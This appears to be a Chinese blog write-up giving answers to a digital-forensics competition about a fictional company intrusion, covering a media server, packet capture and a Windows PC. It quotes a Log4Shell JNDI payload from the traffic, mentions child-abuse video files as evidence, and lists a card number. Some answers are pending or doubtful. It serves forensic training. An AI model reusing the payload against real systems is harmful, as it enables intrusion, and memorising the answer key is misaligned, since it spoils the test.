文章目录
- 前言
- 题目
- 流媒体服务器分析
- 2.[填空题] 就AGC集团网络的流媒体服务器 (Media Server),有多少个本地用户曾经成功登录过? (以阿拉伯数字回答) (1分)
- 3.就AGC集团网络的流媒体服务器,有多少个本地用户曾经成功用 ‘ssh’ (Secure Shell)登录过? (以阿拉伯数字回答) (2分)
- 4.[填空题]就上述的本地用户,成功通过 'ssh' 登录过该流媒体服务器多少次? (以阿拉伯数字回答) (3分)
- 5.[单选题]试找找记录失败的登录尝试信息. 有以下哪一个名称曾尝试用 'ssh:notty' 登录该流媒体服务器? (2分)
- 6.[填空题]就该流媒体服务器的本地用户, 有一个用户名是 'S' 开头的, 该用户的姓氏是什么? (以大写英文回答) (3分)
- 7.[多选题]该流媒体服务器是有使用Docker容器 (Docker Container) 的,当中包含以下哪个Docker镜像 (Docker Image) ? (3分)
- 8.[单选题]就上述的Docker镜像,哪一个镜像在系统上运行中? (2分)
- 9.[多选题]该流媒体服务器是使用 'WordPress' 建站 (Create Website) 的,就 '比特币' 标题,有以下的电子邮箱地址曾经留有评论? (2分)
- 10.[单选题]该流媒体服务器里其中一个本地用户是有使用 'calendar' 日历工具的, 日历内曾经提及以下哪个网站? (3分)
- 11.[单选题]该流媒体服务器里是有使用磁盘阵列 (RAID) 的, 该设备是使用哪一个 RAID 级别? (请选择最合适的答案) (1分)
- 12.[单选题]该基本镜像存储池 (Basic Storage Pool) 里储存了一些视频档案, 请找出一段儿童色情影片, 该档案的最后修改时间是什么月份? (2分)
- 13.[填空题]承上题,拥有该段儿童色情影片的用户名称是什么? (不要输入符号,以大写英文及阿拉伯数字回答) (1分)
- 14.[填空题]就AGC集团网络的流媒体服务器,曾经有用户搜索过有关于儿童色情影片的资料而得到搜索结果,该用户所输入的网址是什么? (不要输入符号,以大写英文及阿拉伯数字回答,如 https://web3.com,需回答 HTTPSWEB3COM)
- 15.[填空题]该基本镜像存储池 (pool) 有一个快照 (Snapshot),快照的名称是什么? (不要输入符号,以大写英文及阿拉伯数字回答,如 media/mediapool@abc123,需回答MEDIAMEDIAPOOLABC123) (1分)
- 16. [填空题]就上述所找到的基本镜像存储池快照 (Snapshot),它储存了多少个档案? (以阿拉伯数字回答) (1分)
- 流量分析
- 21. [单选题]分析IP地址61.238.217.108向AGC服务器10.0.66.184发送的第一个 'GET' 指令,它请求的统一资源定位系统 (Uniform Resource Locator - URL) 是什么? (1分)
- 22.[单选题] IP地址61.238.217.108曾经向AGC服务器10.0.66.184发送 ‘POST’ 指令,它在 ‘HTML Form’ 项目的 ‘uname’ 栏所输入的字符串是什么? (1分)
- 23. [单选题]AGC服务器10.0.66.184收到IP地址61.238.217.108的 'POST' 指令后,它执行了哪些行动? (2分)
- 24. [填空题]在上述行动后,IP地址61.238.217.108利用哪个端口 (Port) 向AGC服务器10.0.66.184发出指令? (以阿拉伯数字回答) (1分)
- 25. [多选题]AGC服务器10.0.66.184里有一个AGC目录 (Directory),它的子目录 (Sub Directory) 包含以下哪一个? (2分)
- 26. [多选题]入侵者迸入AGC服务器10.0.66.184后,他成功执行以下哪些指令? (2分)
- 27. [单选题]入侵者曾经传送一个档案到AGC服务器10.0.66.184并将它改名 (Rename),这个档案的原来名称是什么?(1分)
- 28. [单选题]承上题,该档案原档的建立日期是什么? (2分)
- 29. [单选题]承上题,该档案的SHA-256哈希值是什么?
- Windows计算机
- 31. [单选题]分析AGC-CS计算机 (Computer) 里最初的作業系統 (Windows) ,它的实際安装时间是什么? (以时区UTC+8回答) (3分)
- 32. [单选题]AGC-CS计算机里的 'Acrobat DC' 软件的安装时间是? (以时区UTC+8回答) (如答案为 2022-12-29 16:01:59,需回答 20221229160159) (1分)
- 33. [单选题]AGC-CS计算机里的用户 'Carson' 链接了一个网络磁盘机 (Network Drive),在下列哪一个档案有相关资料? (2分)
- 34. [单选题]承上题,用户 'Carson' 连接的网络磁盘机的IP地址是什么? (1分)
- 35. [填空题]分析计算机里的电邮数据,当中包含嫌疑人王景浩可能的居住地址,请回答他住址的楼层 (以阿拉伯数字回答) (1分)
- 36. [填空题]承上题,王景浩使用的信用卡号码最后四位数字是? (1分)
- 37. [填空题]AGC-CS计算机用户 'Carson' 曾经收到一个电邮并通过里面的链结下载了一个可疑的 'Word' 文件,那个档案的档案名是什么? (不要输入 '.',以大写英文及阿拉伯数字回答。如 Cat10.jpg,需回答CAT10JPG) (1分)
- 38. [单选题]承上题,分析该 'Word' 文件,它的可能用途是? (3分)
- 39. [单选题]AGC-CS计算机里有一个名为 'admin' 的用户,它是在何时被建立的? (以时区UTC+8回答) (1分)
- 40. [填空题]黑客第一次采用用户 'admin' 通过远程桌面协议 (Remote Desktop Protocol - RDP) 登录了AGC-CS计算机的时间是? (以时区UTC+8回答) (如答案为 2022-12-29 16:01:59,需回答 20221229160159) (2分)
- 41. [填空题]黑客入侵AGC-CS计算机后下载了一个扫描端口 (Port Scanning) 的软件,这软件的真正名称是? (以大写英文及阿拉伯数字回答) (3分)
- 42. [填空题]承上题,黑客采用上述软件取得一些计算机的IP地址及媒体访问控制地址 ('Media Access Control' Address - MAC Address) 并存到一个名为 'ip.txt' 的档案。当中 '192.168.182.130' 计算机的MAC地址是什么? (不要输入 ':' 或 '-' ,以大写英文及阿拉伯数字回答) (3分)
- 43. [填空题]AGC-CS计算机里的一个跳转列表 (Jumplist) 显示了用户 'admin' 曾经采用记事本 (Notepad) 打开了一个文字档案,这个文字档的SHA-256哈希值是什么? (以大写英文及阿拉伯数字回答) (3分)
- 44. [单选题]黑客除了通过 'RDP' 外,还采用什么软件远端控制 (Remote Control) AGC-CS计算机? (1分)
前言
搜查人员于现场捡取一部服务器、一部员工 (Carson) 所用的桌面计算机及一 部流媒体服务器。 AGC 集团 IT 部門 人员称建立服务器的同事已离职,他只是 负责以浏览器登入服务器操作,对系统并不熟悉。 他只知道服务器所用的操作 系统为 “Proxmox”,上面运作一个虚拟计算器。 虚拟计算机运作公司的电邮系 统“Xeams”。现场专家在初步分析后表示“Proxmox”服务器透过三个硬盘以软 RAID 建立而成, 现场虽未能撷取服务器逻辑存储(Logical Storage)内容,但他认为先撷取逻辑存 储内容作检验较好; 桌面计算机相信被黑客入侵,分析流量纪录相信黑客取走了 服务器部份档案。
题目
流媒体服务器分析
2.[填空题] 就AGC集团网络的流媒体服务器 (Media Server),有多少个本地用户曾经成功登录过? (以阿拉伯数字回答) (1分)
使用lastlog命令查看各个用户登录情况
lastlog命令列出了各个用户的登录情况,如果没有登录过,则显示Never logged in,如果有登录历史,则显示出ip及登录时间。
sudo lastlog
user pts/1 192.168.182.139 四 7月 21 10:25:36 +0800 2022
sshd **Never logged in**
sammy pts/1 192.168.182.1 五 7月 22 14:22:40 +0800 2022
mysql **Never logged in**
mediauser pts/0 192.168.182.1 二 7月 19 15:04:39 +0800 2022
本地用户登录成功的有:reboot、mediause、sammy
答案:3
3.就AGC集团网络的流媒体服务器,有多少个本地用户曾经成功用 ‘ssh’ (Secure Shell)登录过? (以阿拉伯数字回答) (2分)
通过使用
last
lastlog
对比得出只有reboot、mediause、sammy三个用户的成功登录记录
答案:3
4.[填空题]就上述的本地用户,成功通过 ‘ssh’ 登录过该流媒体服务器多少次? (以阿拉伯数字回答) (3分)
火眼取证分析工具
路径:Liunx基本信息——>分区——>登录日志——>登录成功
进行登录ip筛选排序可以得到有12次
答案:12
5.[单选题]试找找记录失败的登录尝试信息. 有以下哪一个名称曾尝试用 ‘ssh:notty’ 登录该流媒体服务器? (2分)
A. iamhacker
B. hacking
C. hack
D. hacker
E. 以上皆非
在/var/log/btmp中可以查看到登陆失败的记录(可通过lastb命令进行检查)
直接打开备份日志中可以看到有两个用户:sammy、hack
答案:C
6.[填空题]就该流媒体服务器的本地用户, 有一个用户名是 ‘S’ 开头的, 该用户的姓氏是什么? (以大写英文回答) (3分)
硬着头皮从数据库上一个个找
解析数据库,首先在配置文件中找到数据库登录用户和密码
/** Database username */
define( 'DB_USER', 'wordpress' );
/** Database password */
define( 'DB_PASSWORD', 'user' );
解析数据库
mysql -uwordpress -puser
show databases;
use wordpress;
show tables;
select * from wp_usermeta;
可以看到
nickname sammy
first_name sammy
last_name Li
答案:Li
7.[多选题]该流媒体服务器是有使用Docker容器 (Docker Container) 的,当中包含以下哪个Docker镜像 (Docker Image) ? (3分)
A. apache2
B. ubuntu
C. centos
D. nginx
E. hello-world
F. 以上皆非
可以直接通过取证软件查看
或者通过命令
docker images
答案:BCDE
8.[单选题]就上述的Docker镜像,哪一个镜像在系统上运行中? (2分)
A. apache2
B. ubuntu
C. centos
D. nginx
E. hello-world
F. 以上皆非
命令
docker ps
答案:D
9.[多选题]该流媒体服务器是使用 ‘WordPress’ 建站 (Create Website) 的,就 ‘比特币’ 标题,有以下的电子邮箱地址曾经留有评论? (2分)
A. cn.wordpress.org
B. root58462@mail.qq.com
C. hi456@163.com
D. root@163.com
E. user1@localhost.net
F. 以上皆非
一般做法:
解析数据库,首先在配置文件中找到数据库登录用户和密码
/** Database username */
define( 'DB_USER', 'wordpress' );
/** Database password */
define( 'DB_PASSWORD', 'user' );
登录数据后操作一手
mysql -uwordpress -puser
show databases;
use wordpress;
show tables;
select * from wp_comments;
答案:BC
10.[单选题]该流媒体服务器里其中一个本地用户是有使用 ‘calendar’ 日历工具的, 日历内曾经提及以下哪个网站? (3分)
A. https://weibo.com
B. http://www.baidu.com
C. https://www.douyin.com
D. https://youku.com
E. https://www.binance.com
F. 以上皆非
直接打开
答案:E
11.[单选题]该流媒体服务器里是有使用磁盘阵列 (RAID) 的, 该设备是使用哪一个 RAID 级别? (请选择最合适的答案) (1分)
A. RAID 0
B. RAIDz2
C. RAIDz3
D. RAID 10
E. RAID 5
F. 以上皆非
调查报告中显示raid级别为mirror
答案:F
12.[单选题]该基本镜像存储池 (Basic Storage Pool) 里储存了一些视频档案, 请找出一段儿童色情影片, 该档案的最后修改时间是什么月份? (2分)
A. Jun
B. Jul
C. Aug
D. Sep
E. Oct
F. 以上皆非
我使用火眼仿真系统,仿真的时候将所有镜像都选择上,排序为acbde,根据调查报告来走。
使用命令Open /media0/mediastorage
文件名为迷住了幼迷住.mp4
答案:D
13.[填空题]承上题,拥有该段儿童色情影片的用户名称是什么? (不要输入符号,以大写英文及阿拉伯数字回答) (1分)
ll并不是linux下一个基本的命令,它实际上是ls -l的一个别名。
ll -grep | 迷住了
答案:ROOT
14.[填空题]就AGC集团网络的流媒体服务器,曾经有用户搜索过有关于儿童色情影片的资料而得到搜索结果,该用户所输入的网址是什么? (不要输入符号,以大写英文及阿拉伯数字回答,如 https://web3.com,需回答 HTTPSWEB3COM)
待定
15.[填空题]该基本镜像存储池 (pool) 有一个快照 (Snapshot),快照的名称是什么? (不要输入符号,以大写英文及阿拉伯数字回答,如 media/mediapool@abc123,需回答MEDIAMEDIAPOOLABC123) (1分)
zpool list
查看池健康状态和空间使用情况
可以使用 -t 选项指定要显示的数据集的类型
| 类型 | 说明 |
|---|---|
| filesystem | 文件系统和克隆 |
| volume | 卷 |
| snapshot | 快照 |
使用命令zfs list -t snapshot
答案:MEDIA0MEDIASTORAGEVERSION1
16. [填空题]就上述所找到的基本镜像存储池快照 (Snapshot),它储存了多少个档案? (以阿拉伯数字回答) (1分)
使用命令zfs rollback media0/mediastorage@version1回滚镜像,查看文件数量
答案:24
流量分析
21. [单选题]分析IP地址61.238.217.108向AGC服务器10.0.66.184发送的第一个 ‘GET’ 指令,它请求的统一资源定位系统 (Uniform Resource Locator - URL) 是什么? (1分)
A. http://155.137.195.111:8080
B. http://www.w3.org/2003/05/soap-envelope
C. http://61.238.217.108:8000
D. 以上皆非
寻找到61.238.217.108向AGC服务器10.0.66.184发送的流量,右键追踪TCP流
可以得到
答案:A
22.[单选题] IP地址61.238.217.108曾经向AGC服务器10.0.66.184发送 ‘POST’ 指令,它在 ‘HTML Form’ 项目的 ‘uname’ 栏所输入的字符串是什么? (1分)
A. root
B. ${jndi:ldap://61.238.217.108:1389/a}
C. application/x-www-form-urlencoded
D. password
过滤流量,右键追踪TCP流
得到:uname=%24%7Bjndi%3Aldap%3A%2F%2F61.238.217.108%3A1389%2Fa%7D&password=password
答案:B
23. [单选题]AGC服务器10.0.66.184收到IP地址61.238.217.108的 ‘POST’ 指令后,它执行了哪些行动? (2分)
A. 使用端口46858连接IP地址61.238.217.108的LDAP服务器的指定端口
B. 于IP地址61.238.217.108下载了Exploit.class
C. 使用端口49264连接IP地址61.238.217.108发送同步要求
D. 以上皆是
根据11流,在查找下一流也就是12流是,可以确定46858向1389发送了请求
文件中导出对象选择HTTP流可以确定有下载Exploit.class
在14流中可以确定使用了49264端口接收9001端口发送的报文
答案:D
24. [填空题]在上述行动后,IP地址61.238.217.108利用哪个端口 (Port) 向AGC服务器10.0.66.184发出指令? (以阿拉伯数字回答) (1分)
查看流14
答案:9001
25. [多选题]AGC服务器10.0.66.184里有一个AGC目录 (Directory),它的子目录 (Sub Directory) 包含以下哪一个? (2分)
A. Accounting
B. Picture
C. Staff
D. Sambashare
E. Retail
追踪到14流,可以发现登录之后进行命令执行
ls
AGC
cd AGC
ls
Accounting
Personnel
Retail
Share
Staff
cd Staf
答案:ACE
26. [多选题]入侵者迸入AGC服务器10.0.66.184后,他成功执行以下哪些指令? (2分)
A. 檢视了readme.txt内容
B. 删除了三个档案
C. 删除了一个目录 (Directory)
D. 替档案改名
E. 建立了两个txt档案
分析14流
答案:DE
27. [单选题]入侵者曾经传送一个档案到AGC服务器10.0.66.184并将它改名 (Rename),这个档案的原来名称是什么?(1分)
A. cGhvdG9zT0Zyb2NreQ==
B. Finanical.xls
C. readme.txt
D. anonymous
追踪流就可以看到了
ls
cGhvdG9zT0Zyb2NreQ==
mv cGhvdG9zT0Zyb2NreQ== readme.pdf
答案:A
28. [单选题]承上题,该档案原档的建立日期是什么? (2分)
A. 2022-10-21 08:10:30 (UTC+0)
B. 2022-10-21 16:19:39 (UTC+0)
C. 2022-10-22 08:10:30 (UTC+0)
D. 2022-10-22 14:22:06 (UTC+0)
E. 2022-10-22 16:19:39(UTC+0)
在windows在文件导出对象中将上述文件导出,但是文件日期就自动修改了
所以我用foremost分离出pdf文件
查看文件属性
Fri 21 Oct 2022 09:19:39 AM PDT
答案:B
29. [单选题]承上题,该档案的SHA-256哈希值是什么?
A. a6eef1... ...27364c
B. 54785c… ...fe86f0
C. 961f2b… ...647d55
D. a00e6c… ...d0eaab
E. 以上皆非
将文件从流量包中导出,然后使用工具校验
答案:B
Windows计算机
31. [单选题]分析AGC-CS计算机 (Computer) 里最初的作業系統 (Windows) ,它的实際安装时间是什么? (以时区UTC+8回答) (3分)
A. 2022-09-26 14:35:17
B. 2022-09-26 21:35:17
C. 2022-09-27 05:35:17
D. 2022-10-05 03:52:15
E. 2022-10-05 11:52:15
2022-10-05 03:52:15
也可以仿真之后用systeminfo命令查看初始安装时间
答案:D
32. [单选题]AGC-CS计算机里的 ‘Acrobat DC’ 软件的安装时间是? (以时区UTC+8回答) (如答案为 2022-12-29 16:01:59,需回答 20221229160159) (1分)
A. 2022-09-28 19:01:40
B. 2022-09-28 07:18:33
C. 2022-08-30 19:01:40
D. 2022-08-30 07:18:33
答案:A
33. [单选题]AGC-CS计算机里的用户 ‘Carson’ 链接了一个网络磁盘机 (Network Drive),在下列哪一个档案有相关资料? (2分)
A. \Users\Carson\NTUSER.DAT
B. \Users\admin\NTUSER.DAT
C. \Windows\System32\config\SYSTEM
D. \Windows\System32\config\SOFTWARE
E. \Windows\System32\config\SECURITY
网络磁盘采用\ip的方式进行访问,查看资源管理器的记录
存在一个share(分享),192.168.182.134ip下的,跳转源文件就可以了
答案:A
34. [单选题]承上题,用户 ‘Carson’ 连接的网络磁盘机的IP地址是什么? (1分)
A. \\192.168.182.134\
B. \\192.168.182.134\photo
C. \\192.168.182.134\share
D. \\192.168.182.134\AGC
E. \\192.168.182.134\AGC photo
根据33题就可以看到
答案:C
35. [填空题]分析计算机里的电邮数据,当中包含嫌疑人王景浩可能的居住地址,请回答他住址的楼层 (以阿拉伯数字回答) (1分)
查看邮件解析
信用卡號碼如上,送貨地址:香港灣仔港灣道28號灣景中心A座45樓C室
請問幾時送貨
答案:45
36. [填空题]承上题,王景浩使用的信用卡号码最后四位数字是? (1分)
查看邮件解析的数据
或者通过仿真在最近打开项目中可以看到银行卡
银行卡号为:5395910070166717
答案:6717
37. [填空题]AGC-CS计算机用户 ‘Carson’ 曾经收到一个电邮并通过里面的链结下载了一个可疑的 ‘Word’ 文件,那个档案的档案名是什么? (不要输入 ‘.’,以大写英文及阿拉伯数字回答。如 Cat10.jpg,需回答CAT10JPG) (1分)
对邮件进行分析查看
Carson,你們的做生意手法很有問題,沒有貨但不能退訂......真的很想去消委會投訴你們公司,
算吧,如果這沒有貨,你給我看看這KEFmuon 有沒有貨,型號、規格詳情附載於連結中,請看看
https://docs.google.com/document/d/1qK5AQleyHjWYK8UWlrKRXlIiPXT-HDu-/edit
?usp=sharing&ouid=107263767302169929109&rtpof=true&sd=trueOn Sep 27, 2022, at
可以得到一个链接。链接可以确定他是谷歌下载的
在路径/users/carson/downloads/下可以找到个名为KEFmuon.docx
答案:KEFMUONDOCK
38. [单选题]承上题,分析该 ‘Word’ 文件,它的可能用途是? (3分)
A. 访问一个网站
B. 记录键盘操作
C. 把档案加密
D. 改变桌面壁纸
E. 关闭计算机
将文件导出来
平台分析:https://www.threatbook.cn/product/sandbox
腾讯:https://habo.qq.com/
答案:A
39. [单选题]AGC-CS计算机里有一个名为 ‘admin’ 的用户,它是在何时被建立的? (以时区UTC+8回答) (1分)
A. 2022-09-28
B. 2022-09-29
C. 2022-09-30
D. 2022-10-01
E. 以上皆非
根据账户登录信息、更改密码日期、系统安全日志记录
答案:B
40. [填空题]黑客第一次采用用户 ‘admin’ 通过远程桌面协议 (Remote Desktop Protocol - RDP) 登录了AGC-CS计算机的时间是? (以时区UTC+8回答) (如答案为 2022-12-29 16:01:59,需回答 20221229160159) (2分)
根据/Users/admin/AppData/Roaming/TeamViewer/Connections.txt
答案:20220930171526
41. [填空题]黑客入侵AGC-CS计算机后下载了一个扫描端口 (Port Scanning) 的软件,这软件的真正名称是? (以大写英文及阿拉伯数字回答) (3分)
黑客最早在29号入侵,因此看这之后的下载记录,只有一个putty
答案:PUTTY
42. [填空题]承上题,黑客采用上述软件取得一些计算机的IP地址及媒体访问控制地址 (‘Media Access Control’ Address - MAC Address) 并存到一个名为 ‘ip.txt’ 的档案。当中 ‘192.168.182.130’ 计算机的MAC地址是什么? (不要输入 ‘:’ 或 ‘-’ ,以大写英文及阿拉伯数字回答) (3分)
这份文件被传输到王景浩的苹果电脑
在王景浩的电脑找到打开
可以定位到
答案:9061AEC09045
43. [填空题]AGC-CS计算机里的一个跳转列表 (Jumplist) 显示了用户 ‘admin’ 曾经采用记事本 (Notepad) 打开了一个文字档案,这个文字档的SHA-256哈希值是什么? (以大写英文及阿拉伯数字回答) (3分)
答案:待定
44. [单选题]黑客除了通过 ‘RDP’ 外,还采用什么软件远端控制 (Remote Control) AGC-CS计算机? (1分)
A. VNC
B. Teamviewer
C. Anydesk
D. Splashtop Business Access
E. RemotePC
答案:B
5万+
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
